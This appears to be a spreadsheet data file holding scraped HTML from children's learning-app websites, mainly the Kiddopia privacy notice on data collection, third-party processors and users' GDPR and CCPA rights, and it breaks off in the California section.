			&lt;aside class="article-view__sidebar"&gt;&lt;nav class="section-menu" data-amplitude-link-position="sidebar"&gt;&lt;div class="section-menu__title"&gt;GDPR and data privacy&lt;/div&gt;&lt;ul id="menu-gdpr-and-data-privacy" class="section-menu-primary"&gt;&lt;li id="menu-item-688" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-688"&gt;&lt;a href="https://trust.kahoot.com/dpa/" itemprop="url"&gt;Data Processing Agreement&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-186" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-186"&gt;&lt;a href="https://trust.kahoot.com/gdpr-compliance/" itemprop="url"&gt;GDPR Compliance&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-82" class="menu-it</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html data-n-head-ssr&gt;
  &lt;head&gt;
    &lt;title&gt;Preschool learning games &amp; cartoons for kids.&lt;/title&gt;&lt;meta data-n-head="ssr" charset="utf-8"&gt;&lt;meta data-n-head="ssr" name="viewport" content="width=device-width,initial-scale=1"&gt;&lt;meta data-n-head="ssr" data-hid="twitter:title" name="twitter:title" content="This is how you can help your children succeed"&gt;&lt;meta data-n-head="ssr" data-hid="twitter:description" name="twitter:description" content="Take a short quiz and start your child’s educational journey. ABC, math, logic, creativity made easy. Approved by learning experts, loved by millions kids.</t>
  </si>
  <si>
    <t>"&gt;&lt;meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="/meta.jpeg"&gt;&lt;meta data-n-head="ssr" data-hid="twitter:image:alt" name="twitter:image:alt" content="This is how you can help your children succeed"&gt;&lt;meta data-n-head="ssr" data-hid="og:url" property="og:url" content="https:////"&gt;&lt;meta data-n-head="ssr" data-hid="og:type" property="og:type" content="website"&gt;&lt;meta data-n-head="ssr" data-hid="og:title" property="og:title" content="This is how you can help your children succeed"&gt;&lt;meta data-n-head="ssr" data-hid="og:description" property="og:description" content="Take a short quiz and start your child’s educational journey. ABC, math, logic, creativity made easy. Approved by learning experts, loved by millions kids.</t>
  </si>
  <si>
    <t>"&gt;&lt;meta data-n-head="ssr" data-hid="og:image" property="og:image" content="/meta.jpeg"&gt;&lt;meta data-n-head="ssr" data-hid="og:image:secure_url" property="og:image:secure_url" content="/meta.jpeg"&gt;&lt;meta data-n-head="ssr" data-hid="og:image:alt" property="og:image:alt" content="This is how you can help your children succeed"&gt;&lt;meta data-n-head="ssr" data-hid="description" name="description" content="Help your child learn numbers, alphabet, colors, shapes and other early concepts. Download now and you will see efficient educational games while your child will see fun!"&gt;&lt;meta data-n-head="ssr" data-hid="keywords" name="keywords" content="free learning games for preschoolers learning games for preschoolers alphabet learning games for preschoolers free online learning games for preschoolers online learning games for preschoolers free learning letters games for preschoolers learning games for toddlers pre-k preschool learning games for kids and toddlers free learning games for toddlers learning colors for toddlers games interactive learning games for toddlers"&gt;&lt;link data-n-head="ssr" rel="icon" type="image/png" href="/favicon.svg"&gt;&lt;link data-n-head="ssr" rel="preconnect" href="https://fonts.gstatic.com"&gt;&lt;link data-n-head="ssr" rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;600;700;800;900&amp;display=swap"&gt;&lt;script data-n-head="ssr" src="https://code.iconify.design/1/1.0.7/iconify.min.js"&gt;&lt;/script&gt;&lt;script data-n-head="ssr" src="https://www.googletagmanager.com/gtag/js?id=AW-10875242056"&gt;&lt;/script&gt;&lt;script data-n-head="ssr" src="https://cdn.solidgate.com/js/solid-form.js"&gt;&lt;/script&gt;&lt;script data-n-head="ssr" src="https://connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v11.0" defer async crossorigin="anonymous" nonce="6yKFSCL5"&gt;&lt;/script&gt;&lt;script data-n-head="ssr" data-hid="zendesk" src="https://static.zdassets.com/ekr/snippet.js?key=d75312ce-6051-47f2-8c9c-c8058244cc34" id="ze-snippet" defer&gt;&lt;/script&gt;&lt;script data-n-head="ssr" id="cookieyes" src="https://cdn-cookieyes.com/client_data/f4a8b7623ec324ac86b409b3/script.js"&gt;&lt;/script&gt;&lt;link rel="preload" href="/_nuxt/3553dbfdad0cc1de9c067972e83c4b8c.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/6ed13e1528b5a48430599fc663d4e2f0.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/e2422bf9fabded5e5755410f7c2f7dcd.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/cbfa00e13e72c4600f789853d33b7c86.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/2acb3bde46f416b2e19d1ac604f31b48.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/0225416ebef72ce02ec1b093b204b993.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/6fe954db8bac9644b1561fdd62fa18d0.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/img/bg-desktop.c5b8143.jpg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/a19899af184a309877ff0d22690f9327.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/img/bg-mobile.a440722.jpg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/05290278bab5215f0865a5f9f6e8a523.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/72d1200544ee07b715e51bea035f0cd9.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/85ed644a4cb85b10cb51e4b76a2124bf.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/c065c365775b7866c2d37c3f22c0c9ea.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/70289aadcc8bc07c8c33dafb80ec2da3.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/bdc784db352ff899fcf7c1cc195eed5e.svg" as="image"&gt;&lt;link rel="preload" href="/_nuxt/e94c24e69648cc6ff37eccf265457c75.svg" as="image"&gt;&lt;link rel="stylesheet" href="/_nuxt/css/4fac73e.css"&gt;&lt;link rel="preload" href="/_nuxt/static/1681309085/terms/privacy-policy/state.js" as="script"&gt;&lt;link rel="preload" href="/_nuxt/static/1681309085/terms/privacy-policy/payload.js" as="script"&gt;&lt;link rel="preload" href="/_nuxt/static/1681309085/manifest.js" as="script"&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;div data-server-rendered="true" id="__nuxt"&gt;&lt;div id="__layout"&gt;&lt;section class="default-layout"&gt;&lt;div id="fb-root"&gt;&lt;/div&gt; &lt;!---- &gt; &lt;!----&gt;&lt;/section&gt;&lt;/div&gt;&lt;/div&gt;&lt;script</t>
  </si>
  <si>
    <t xml:space="preserve">defer src="/_nuxt/static/1681309085/terms/privacy-policy/state.js"&gt;&lt;/script&gt;&lt;script src="/_nuxt/0865667.js" defer&gt;&lt;/script&gt;&lt;script src="/_nuxt/a85a216.js" defer&gt;&lt;/script&gt;&lt;script src="/_nuxt/4a3c284.js" defer&gt;&lt;/script&gt;&lt;script src="/_nuxt/b86166d.js" defer&gt;&lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="UTF-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
    &lt;!-- Primary Meta Tags --&gt;
    &lt;title&gt;Kiddopia | Privacy Policy&lt;/title&gt;
    &lt;meta name="title" content="Kiddopia | Privacy Policy"&gt;
    &lt;meta name="description"
        content="Build a solid foundation of math, science and problem-solving through research-backed learning activities designed by experts. Try Free for 7 Days!"</t>
  </si>
  <si>
    <t>/&gt;
    &lt;meta name="apple-itunes-app" content="app-id=1223397201"&gt;
    &lt;meta property="fb:app_id" content="444944209213328" /&gt;
    &lt;!-- Open Graph / Facebook --&gt;
    &lt;meta property="og:type" content="website" /&gt;
    &lt;meta property="og:url" content="https://kiddopia.comprivacy-policy.html" /&gt;
    &lt;meta property="og:title" content="Kiddopia | Privacy Policy"&gt;
    &lt;meta property="og:description"
        content="Build a solid foundation of math, science and problem-solving through research-backed learning activities designed by experts. Try Free for 7 Days!"</t>
  </si>
  <si>
    <t>/&gt;
    &lt;meta property="og:image" content="https://kiddopia.com/static/images/kiddopia-social-image-fb.png"&gt;
    &lt;!-- Twitter --&gt;
    &lt;meta name="twitter:card" content="summary_large_image"&gt;
    &lt;meta name="twitter:url" content="https://kiddopia.comprivacy-policy.html"&gt;
    &lt;meta name="twitter:title" content="Kiddopia | Privacy Policy"&gt;
    &lt;meta name="twitter:description"
        content="Build a solid foundation of math, science and problem-solving through research-backed learning activities designed by experts. Try Free for 7 Days!"</t>
  </si>
  <si>
    <t>&gt;
    &lt;meta name="twitter:image" content="https://kiddopia.com/static/images/kiddopia-social-image-twitter.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="180x180" href="/static/favicon/apple-touch-icon.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="32x32" href="/static/favicon/favicon-32x32.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="16x16" href="/static/favicon/favicon-16x16.png"&gt;
    &lt;link rel="manifest" href="/static/favicon/site.webmanifest"&gt;
    &lt;meta name="msapplication-TileColor" content="#da532c"&gt;
    &lt;meta name="theme-color" content="#ffffff"&gt;
    &lt;link rel="preconnect" href="https://fonts.gstatic.com"&gt;
    &lt;link rel="preconnect" href="https://kiddopia.appspot.com"&gt;
    &lt;link rel="preload stylesheet"
        href="https://fonts.googleapis.com/css2?family=Inter:wght@100;300;400;500;600&amp;family=Quicksand:wght@600;700&amp;family=Roboto:wght@400&amp;display=swap"
        as="style" crossorigin="anonymous"&gt;
    &lt;link rel="preload" href="/static/fonts/gotham-rounded/GothamRnd-Medium.otf" as="font" crossorigin="anonymous"&gt;
    &lt;link rel="preload" href="/static/fonts/gotham-rounded/GothamRnd-Bold.otf" as="font" crossorigin="anonymous"&gt;
    &lt;link rel="preload stylesheet" href="/static/vendor/css/bootstrap.min.css" as="style" crossorigin="anonymous"&gt;
        &lt;link rel="preload stylesheet" href="/static/vendor/css/slick.css" as="style" crossorigin="anonymous"&gt;
        &lt;link rel="preload stylesheet" href="/static/vendor/css/slick.theme.css" as="style" crossorigin="anonymous"&gt;
        &lt;link rel="preload stylesheet" href="/static/vendor/css/swiper-bundle.min.css" as="style" crossorigin="anonymous"&gt;
    &lt;link rel="preload stylesheet" href="/static/vendor/css/easy-autocomplete.min.css" as="style" crossorigin="anonymous"&gt;
    &lt;link rel="preload stylesheet" href="/static/vendor/css/easy-autocomplete.themes.min.css" as="style"
        crossorigin="anonymous"&gt;
    &lt;link rel="prefetch stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/Trumbowyg/2.23.0/ui/trumbowyg.min.css"
        as="style" crossorigin="anonymous"
        integrity="sha512-iw/TO6rC/bRmSOiXlanoUCVdNrnJBCOufp2s3vhTPyP1Z0CtTSBNbEd5wIo8VJanpONGJSyPOZ5ZRjZ/ojmc7g=="
        crossorigin="anonymous" /&gt;
    &lt;link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css" rel="preload stylesheet" as="style" /&gt;
    &lt;link rel="preload stylesheet" href="/static/css/style.css" as="style" crossorigin="anonymous"&gt;
    &lt;link rel="prefetch" href="https://js.stripe.com/v3/" as="script" /&gt;
    &lt;link rel="preload" href="/static/vendor/js/yall.min.js" as="script" /&gt;
    &lt;link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fontfaceobserver/2.1.0/fontfaceobserver.js"
        integrity="sha512-b0xqcUdOhONKgZmeS/YSN/gd8QdAtetBOROQf3lqJF9uS0XHoEl2hUxBF/RMqMXdt2WUBq8drpNPjnEJxmka3Q=="
        crossorigin="anonymous" as="script" /&gt;
    &lt;link rel="preload" href="/static/vendor/js/jquery-3.5.1.min.js"
        integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous" as="script" /&gt;
    &lt;link rel="preload" href="/static/vendor/js/popper.min.js" as="script" /&gt;
    &lt;link rel="preload" href="/static/vendor/js/bootstrap.min.js" as="script" /&gt;
    &lt;link rel="preload" href="/static/vendor/js/swiper-bundle.min.js" as="script" /&gt;
    &lt;link rel="preload" href="/static/vendor/js/gsap.min.js" as="script" /&gt;
    &lt;link rel="preload" href="/static/vendor/js/ScrollTrigger.min.js" as="script" /&gt;
    &lt;link rel="preload" href="/static/vendor/js/slick.min.js" as="script" /&gt;
    &lt;link rel="preload" href="/static/vendor/js/easy-autocomplete.min.js" as="script" /&gt;
    &lt;link rel="prefetch" href="https://cdnjs.cloudflare.com/ajax/libs/Trumbowyg/2.23.0/trumbowyg.min.js"
        integrity="sha512-sffB9/tXFFTwradcJHhojkhmrCj0hWeaz8M05Aaap5/vlYBfLx5Y7woKi6y0NrqVNgben6OIANTGGlojPTQGEw=="
        crossorigin="anonymous" as="script" /&gt;
    &lt;link rel="preload" href="/static/js/main/script.js" as="script" /&gt;
    &lt;link rel="prefetch" href="https://cdn.jsdelivr.net/npm/sniffr@1.2.0/src/sniffr.min.js" as="script"&gt;
    &lt;link rel="preload" href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js" as="script" /&gt;
    &lt;link rel="preload" href="/static/js/app.js" as="script" /&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class="container mt-3"&gt;
    &lt;h1 class="text-center"&gt;Privacy Notice of Kiddopia&lt;/h1&gt;&lt;br&gt;
    &lt;p class="copytext"&gt;Paper Boat Apps Private Limited (the “Company”, “We”, “Us”, “Our” or “Kiddopia”) are committed to protecting
        your Personal Data and supports the right to your privacy. This Privacy Notice (“Notice”) explains what and how
        Personal Data is collected, and further processed by us, sources (if any) of Personal Data and to whom the
        Personal Data is disclosed.&lt;/p&gt;&lt;br&gt;
    &lt;p class="copytext"&gt;Following are the various sections of the Privacy Notice. To understand in detail how we process and protect
        your Personal Data, please go through each of the sections below:&lt;/p&gt;
    &lt;ol&gt;
        &lt;li class="copytext"&gt;&lt;a</t>
  </si>
  <si>
    <t>href="#1"&gt;What Data is collected?&lt;/a&gt;&lt;/li&gt;
        &lt;li class="copytext"&gt;&lt;a href="#2"&gt;Processing Children’s Data&lt;/a&gt;&lt;/li&gt;
        &lt;li class="copytext"&gt;&lt;a href="#3"&gt;Why do We use your Data?&lt;/a&gt;&lt;/li&gt;
        &lt;li class="copytext"&gt;&lt;a href="#4"&gt;How We protect your Data?&lt;/a&gt;&lt;/li&gt;
        &lt;li class="copytext"&gt;&lt;a href="#5"&gt;Disclosure of your Data&lt;/a&gt;&lt;/li&gt;
        &lt;li class="copytext"&gt;&lt;a href="#6"&gt;Retention of your Data&lt;/a&gt;&lt;/li&gt;
        &lt;li class="copytext"&gt;&lt;a href="#7"&gt;The rights of Users&lt;/a&gt;&lt;/li&gt;
        &lt;li class="copytext"&gt;&lt;a href="#8"&gt;Information for Californian consumers&lt;/a&gt;&lt;/li&gt;
        &lt;li class="copytext"&gt;&lt;a href="#9"&gt;Contact Us&lt;/a&gt;&lt;/li&gt;
        &lt;li class="copytext"&gt;&lt;a href="#10"&gt;Updates to the Privacy Notice&lt;/a&gt;&lt;/li&gt;
    &lt;/ol&gt;
    &lt;div id="1"&gt;
        &lt;h3&gt;1.</t>
  </si>
  <si>
    <t xml:space="preserve">What Data is collected?&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;We may collect the following Personal Data attributes through Our Website:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li class="copytext"&gt;First Name&lt;/li&gt;
            &lt;li class="copytext"&gt;Last Name&lt;/li&gt;
            &lt;li class="copytext"&gt;Email Address&lt;/li&gt;
            &lt;li class="copytext"&gt;Phone Number&lt;/li&gt;
            &lt;li class="copytext"&gt;Picture&lt;/li&gt;
            &lt;li class="copytext"&gt;Location (City, Country)&lt;/li&gt;
            &lt;li class="copytext"&gt;Payment / Billing Details&lt;/li&gt;
            &lt;li class="copytext"&gt;Activity Data (IP address, website usage data, etc.)&lt;/li&gt;
            &lt;li class="copytext"&gt;Device Data (operating system, device model, brand, available storage, etc.)&lt;/li&gt;
        &lt;/ul&gt;
     &lt;/div&gt;
    &lt;div id="2"&gt;
        &lt;h3&gt;2. Processing Children’s Data&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;Within Our App, some of the games may capture Personal Data of children (full name, age and photograph).
            </t>
  </si>
  <si>
    <t>However, these Data attributes are locally stored within the User’s device and cannot be accessed by Us.&lt;/p&gt;
        &lt;p class="copytext"&gt;Parents may review the personal information about their child collected by this Application - if any -
            outlined in the rest of this policy, ask for its deletion and request any further collection or use to be
            omitted by contacting Our Privacy Team at &lt;a href="mailto:privacy@kiddopia.com"&gt;“privacy@kiddopia.com”&lt;/a&gt;.
         &lt;/p&gt;&lt;br&gt;
    &lt;/div&gt;
    &lt;div id="3"&gt;
        &lt;h3&gt;3. Why do We use your Data?&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;We shall use your Data for the below purposes:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li class="copytext"&gt;To enable the parent to register for Kiddopia;&lt;/li&gt;
            &lt;li class="copytext"&gt;To respond to your queries and fulfil your requests;&lt;/li&gt;
            &lt;li class="copytext"&gt;To provide you support and assistance;&lt;/li&gt;
            &lt;li class="copytext"&gt;To process your orders or other billing transactions;&lt;/li&gt;
            &lt;li class="copytext"&gt;To send emails and other communications according to your preferences or that display content that we
                think may
                interest you including reports, new features and promotional offers, etc;&lt;/li&gt;
            &lt;li class="copytext"&gt;To monitor, analyze and describe usage patterns and performance of the service, including aggregate
                metrics
                such as total number of visitors, traffic, and demographic patterns;&lt;/li&gt;
            &lt;li class="copytext"&gt;To improve Our services, including testing, research, internal analytics and product development;&lt;/li&gt;
            &lt;li class="copytext"&gt;To notify you about changes to Our Website and its services;&lt;/li&gt;
            &lt;li class="copytext"&gt;To comply with legal requirements, and to protect Our legal rights or the rights of others.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
    &lt;div id="4"&gt;
        &lt;h3&gt;4.</t>
  </si>
  <si>
    <t>How We protect your Data?&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;We endeavour, where practicable, to process your Personal Data in a safe environment by preventing any
            unauthorized or unlawful processing of Personal Data or accidental loss or destruction of, or damage to such
            information. We have implemented various physical, technical and administrative security measures to protect
            your Personal Data and Our network from unauthorized access.&lt;/p&gt;
        &lt;p class="copytext"&gt;Some of these measures include:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li class="copytext"&gt;encryption in transit or at rest;&lt;/li&gt;
            &lt;li class="copytext"&gt;strict adherence to privacy and security practices;&lt;/li&gt;
            &lt;li class="copytext"&gt;restriction of access to Personal Data to personnel who have a need to know such Data.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
    &lt;div id="5"&gt;
        &lt;h3&gt;5. Disclosure of your Data&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;In some cases, we may disclose your Personal Data with external parties (such as third party technical
            service
            providers, mail carriers, hosting providers, IT companies, communications agencies).</t>
  </si>
  <si>
    <t>We shall ensure that
            all
            such disclosures shall be in accordance with applicable privacy laws (such as executing Data Processing
            Agreements).&lt;/p&gt;
        &lt;p class="copytext"&gt;In some circumstances, Personal Data may also be transferred outside the country of your residence. Such
            transfers shall be in accordance with applicable privacy laws via implementation of appropriate safeguards
            (such
            as Data Transfer Agreements).&lt;/p&gt;
        &lt;p class="copytext"&gt;It should be noted that these external parties are not used for behavioral tracking of children.&lt;/p&gt;
        &lt;p class="copytext"&gt;For more further information on Our appointed external parties, please go through the below details:&lt;/p&gt;&lt;br&gt;
        &lt;h5&gt;Analytics &amp;amp; Measurement&lt;/h5&gt;
        &lt;p class="copytext"&gt;The external parties in this section enable the Us to monitor and analyze web traffic and can be used to keep
            track of User behaviour.&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt; Google Analytics for Firebase (Google LLC)&lt;/u&gt;&lt;/em&gt; - Google Analytics is Our App analytics solution provided
            by Google LLC (“Google”).</t>
  </si>
  <si>
    <t>It is used to generate insights on Our App usage and User engagement. Please go
            through their &lt;a href="https://policies.google.com/u/0/privacy"&gt;Privacy Policy&lt;/a&gt; to learn more
            about their Personal Data processing practices.&lt;/p&gt;
        &lt;p class="copytext"&gt;Firebase is restricted from sharing personal data with any other third-party service providers or other
            Google Services.&lt;/p&gt;
        &lt;p class="copytext"&gt;Personal data collected: &lt;span&gt;IP Address&lt;/span&gt;&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt; AppsFlyer (AppsFlyer Inc.) –&lt;/u&gt;&lt;/em&gt; AppsFlyer is Our attribution tracking solution provider.</t>
  </si>
  <si>
    <t>It helps Us
            determine which campaigns, partners and channels delivered each App install. We rely on these insights to
            measure and optimize Our marketing performance for both User acquisition and retargeting campaigns.&lt;/p&gt;
        &lt;p class="copytext"&gt;Personal data collected: &lt;span&gt;IP Address&lt;/span&gt;&lt;/p&gt;&lt;br&gt;
        &lt;h5&gt; Customer Subscription Management&lt;/h5&gt;
        &lt;p class="copytext"&gt;We use a customer subscription management solution which helps Us to validate and manage the subscription of
            a
            User.</t>
  </si>
  <si>
    <t>It also enables Us to respond to support requests raised by Users related to their subscriptions.&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt;RevenueCat (RevenueCat Inc.)&lt;/u&gt;&lt;/em&gt; - RevenueCat is a subscription management solution provider. The
            service allows Us
            to monitor and analyze the User and their purchase history and can be used to keep track of User behaviour.
         &lt;/p&gt;
        &lt;p class="copytext"&gt;Please go through their &lt;a href="https://www.revenuecat.com/dpa/"&gt;Privacy Policy&lt;/a&gt; to learn more about
            their Personal Data
            processing practices.&lt;/p&gt;
        &lt;p class="copytext"&gt;Personal data collected: &lt;span&gt;</t>
  </si>
  <si>
    <t>First and Last Name, email address, language preference, profile
                picture&lt;/span&gt;&lt;/p&gt;&lt;br&gt;
        &lt;h5&gt;Infrastructure monitoring&lt;/h5&gt;
        &lt;p class="copytext"&gt;This type of service allows Our App to monitor the use and behaviour of its components so its performance,
            operation, maintenance and troubleshooting can be improved.&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt;Crashlytics&lt;/u&gt;&lt;/em&gt; - Crashlytics is a monitoring service provided by Google LLC. Please go
            through their Privacy Policy to learn more about their Personal Data processing practices.&lt;/p&gt;
        &lt;p class="copytext"&gt;Personal data collected: &lt;span&gt;None&lt;/span&gt;&lt;/p&gt;&lt;br&gt;
        &lt;h5&gt;Managing contacts and sending messages&lt;/h5&gt;
        &lt;p class="copytext"&gt;This type of service makes it possible to manage a database of email contacts, phone contacts or any other
            contact information to communicate with the User.</t>
  </si>
  <si>
    <t>These services may also collect Data concerning the date
            and
            time when the message was viewed by the User, as well as when the User interacted with it, such as by
            clicking
            on links included in the message.&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt; Sendgrid (Twilio Inc.)&lt;/u&gt;&lt;/em&gt; - Sendgrid is an email address management and message sending service
            provided by Twilio
            Inc. Please go through their &lt;a href="https://www.twilio.com/legal/privacy"&gt;Privacy Policy&lt;/a&gt; to learn more
            about their Personal Data processing practices.&lt;/p&gt;
        &lt;p class="copytext"&gt;Personal data collected: &lt;span&gt;</t>
  </si>
  <si>
    <t>First and Last name, Email address.&lt;/span&gt;&lt;/p&gt;&lt;br&gt;
        &lt;h5&gt;Managing support and contact requests&lt;/h5&gt;
        &lt;p class="copytext"&gt;This type of service allows Us to manage support and contact requests received. The Personal Data processed
            depend on the information provided by the User in the messages and the means used for communication (e.g.
            email
            address).&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Freshdesk (Freshworks, Inc.)&lt;/u&gt;&lt;/em&gt; - Freshdesk is a support and contact request management service
            provided by
            Freshworks, Inc. Please go through their &lt;a
                href="https://www.freshworks.com/data-processing-addendum/"&gt;Privacy Policy&lt;/a&gt; to learn more about their
            Personal Data processing
            practices.&lt;/p&gt;
        &lt;p class="copytext"&gt;Personal data collected: &lt;span&gt; First and Last name, Email address, provided on a voluntary basis&lt;/span&gt;&lt;/p&gt;
        </t>
  </si>
  <si>
    <t>&lt;br&gt;
        &lt;h5&gt;Registration and authentication&lt;/h5&gt;
        &lt;p class="copytext"&gt;By registering or authenticating, Users allow Us to identify them and give them access to dedicated services.
             In
            this case, We will be able to access some Data, stored by these third party services, for registration or
            authentication purposes.&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt; Firebase Authentication (Google LLC) –&lt;/u&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Firebase is our registration and authentication solution
            provided by
            Google LLC (“Google”). Please go through their &lt;a href="https://policies.google.com/u/0/privacy"&gt;Privacy
                Policy&lt;/a&gt; to learn more about their Personal Data processing
            practices. Firebase is restricted from sharing personal data with any other third-party service providers.
        </t>
  </si>
  <si>
    <t>&lt;/p&gt;
        &lt;p class="copytext"&gt;Personal data collected: &lt;span&gt; First and Last name, Email address, phone number&lt;/span&gt;&lt;/p&gt;
     &lt;/div&gt;
    &lt;div id="6"&gt;
        &lt;h3&gt;6.</t>
  </si>
  <si>
    <t>Retention of your Data&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;We shall retain your Personal Data for as long as it is necessary for the purpose(s) it was collected for. We
            may also retain and use your Personal Data for a longer period as permitted or required by law, to comply
            with
            Our legal, tax or regulatory obligations (e.g. audit and accounting requirements), handle disputes, to
            exercise
            or defend claims. We shall determine the retention period for your Personal Data on the basis of local law
            requirements and business requirements, post which we shall take measures to securely dispose your Personal
            Data.&lt;/p&gt;
    &lt;/div&gt;
    &lt;div id="7"&gt;
        &lt;h3&gt;7.</t>
  </si>
  <si>
    <t xml:space="preserve">The rights of Users&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;We respect your rights and privacy by taking steps to ensure that your Personal Data is accurate and up to
            date.&lt;/p&gt;
        &lt;p class="copytext"&gt;We assure you that:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li class="copytext"&gt;you have the right to know what Personal Data we have about you;&lt;/li&gt;
            &lt;li class="copytext"&gt;you have the right to request a copy of your Personal Data;&lt;/li&gt;
            &lt;li class="copytext"&gt;you have the right to rectify your Personal Data to ensure it is accurate, complete and up to date;&lt;/li&gt;
            &lt;li class="copytext"&gt;you have the right to withdraw your consent from Our processing of your Personal Data;&lt;/li&gt;
            &lt;li class="copytext"&gt;you have the right to prevent processing of your Personal Data related to direct marketing activities.
             &lt;/li&gt;
        &lt;/ul&gt;&lt;br&gt;
        &lt;h5&gt;How to exercise these rights?&lt;/h5&gt;
        &lt;p class="copytext"&gt;Any requests to exercise your rights can be directed to Our Privacy Team at &lt;a
                href="mailto:privacy@kiddopia.com"&gt;“privacy@kiddopia.com”&lt;/a&gt;&lt;/p&gt;&lt;br&gt;
        &lt;h5&gt;How to delete your account?&lt;/h5&gt;
        &lt;p class="copytext"&gt;In the event, if the User wants to delete their account, they can reach out to Our Privacy Team at
            &lt;a href="mailto:privacy@kiddopia.com"&gt;“privacy@kiddopia.com”&lt;/a&gt;.
        </t>
  </si>
  <si>
    <t>&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;If you are not satisfied with the way have handled your request or you would like to make a complaint
                about the
                way we process your personal data, you can contact the relevant Data Protection Authority (DPA). Please
                contact
                us at &lt;a href="mailto:privacy@kiddopia.com"&gt;privacy@kiddopia.com&lt;/a&gt; to find out more.&lt;/em&gt;&lt;/p&gt;&lt;br&gt;
        &lt;h5&gt; How and when we are expected to handle your request?&lt;/h5&gt;
        &lt;p class="copytext"&gt;We will confirm receipt of your verifiable request within 30 days and provide information about how we will
            process your request.</t>
  </si>
  <si>
    <t>We will respond to your request within 45 days of its receipt. Should we need more
            time,
            we will explain to you the reasons why, and how much more time we need. In this regard, please note that we
            may
            take up to 90 days to fulfil your request.&lt;/p&gt;
        &lt;p class="copytext"&gt;We do not charge a fee to process or respond to your verifiable request unless such request is manifestly
            unfounded or excessive.</t>
  </si>
  <si>
    <t>In such cases, we may charge a reasonable fee, or refuse to act on the request. In
            either case, we will communicate Our choices and explain the reasons behind it.&lt;/p&gt;
    &lt;/div&gt;
    &lt;div id="8"&gt;
        &lt;h3&gt;8. Rights for Our Californian consumers&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;If you are residing in California, the CCPA provides you with specific rights regarding your Personal
            Information.</t>
  </si>
  <si>
    <t>This section describes your CCPA rights and explains how to exercise those rights. If there are
            any
            conflicts between this section and any other provision of this Privacy Notice and you are a California
            resident,
            the section that is aligned more protective of your Personal Information shall hold on top of the others.
         &lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt;</t>
  </si>
  <si>
    <t>The right to know&lt;/u&gt;&lt;/em&gt; - You have the right to request to know the categories of Personal Information
            that We collect
            about you, the purposes for which We use your Personal Information and with whom such information is shared.
             The
            details on Personal Information that you can request shall be limited to the information collected or used
            over
            the past 12 months.&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt; The right to delete&lt;/u&gt;&lt;/em&gt; - You have the right to request that we delete the Personal Information that we
            have
            collected about you.</t>
  </si>
  <si>
    <t>Under the CCPA, this right is subject to certain exceptions: for example, we may need
            to
            retain your Personal Data to provide you with the Services or due to a legal obligation. If your deletion
            request is subject to one of these exceptions, we may deny your deletion request.&lt;/p&gt;
